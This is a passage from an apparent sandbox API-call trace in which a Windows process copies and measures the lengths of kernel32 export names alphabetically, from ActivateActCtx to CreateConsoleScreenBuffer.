lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.672] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.673] lstrlenA (lpString="ADDATOMA") returned 8 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.673] lstrlenA (lpString="ADDATOMW") returned 8 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.673] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.673] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.673] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.673] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.673] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.673] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.673] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.673] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.673] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.673] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.673] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.673] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.673] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.673] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.673] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.673] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.674] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.674] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.674] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.674] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.674] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.674] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.674] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.674] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.674] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.674] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.674] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.674] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.674] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.674] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.674] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.674] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.674] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.675] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.675] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.675] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.675] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.675] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.675] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.675] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.675] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.675] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.675] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.675] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.675] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.675] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.675] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.675] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.675] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.675] lstrlenA (lpString="BEEP") returned 4 [0086.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.675] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.676] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.676] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.676] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.676] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.676] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.676] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.676] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.676] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.676] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.676] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.676] lstrlenA (lpString="CANCELIO") returned 8 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.676] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.676] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.676] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.676] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.676] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.676] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.676] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.677] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.677] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.677] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.677] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.677] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.677] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.677] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.677] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.677] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.677] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.677] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.677] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.677] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.677] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.677] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.677] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.677] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.677] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.678] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.678] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.678] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.678] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.678] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.678] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.678] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.678] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.678] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.678] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.678] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.678] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.678] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.678] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.678] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.678] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.678] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.678] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.678] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.679] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.679] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.679] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.679] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.679] lstrlenA (lpString="COPYFILEA") returned 9 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.679] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.679] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.679] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.679] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.679] lstrlenA (lpString="COPYFILEW") returned 9 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.679] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.679] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.679] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.679] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.679] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.679] lstrlenA 